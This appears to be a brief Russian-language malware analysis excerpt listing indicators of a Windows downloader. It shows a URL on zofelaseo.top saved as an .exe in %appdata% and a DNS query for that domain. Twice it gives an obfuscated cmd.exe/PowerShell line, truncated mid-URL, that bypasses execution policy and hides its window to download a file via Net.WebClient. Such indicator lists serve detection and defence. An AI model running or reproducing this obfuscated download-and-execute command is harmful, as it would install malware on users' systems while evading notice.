Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOWErshelL.^eXe -E^x^ec^UTio^nPol^I^Cy byPa^S^s^ -^n^opROF^iLe ^-WInD^OW^St^yLe ^h^I^Dd^en^ (N^EW-O^bjeC^T ^S^y^sT^E^M^.n^Et^.wE^B^CLiEnt)^.^d^ow^n^LOA^DFIl^e('http://zofela...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /C "pOWErshelL.^eXe -E^x^ec^UTio^nPol^I^Cy byPa^S^s^ -^n^opROF^iLe ^-WInD^OW^St^yLe ^h^I^Dd^en^ (N^EW-O^bjeC^T ^S^y^sT^E^M^.n^Et^.wE^B^CLiEnt)^.^d^ow^n^LOA^DFIl^e('http://zofela...' (со скрытым окном)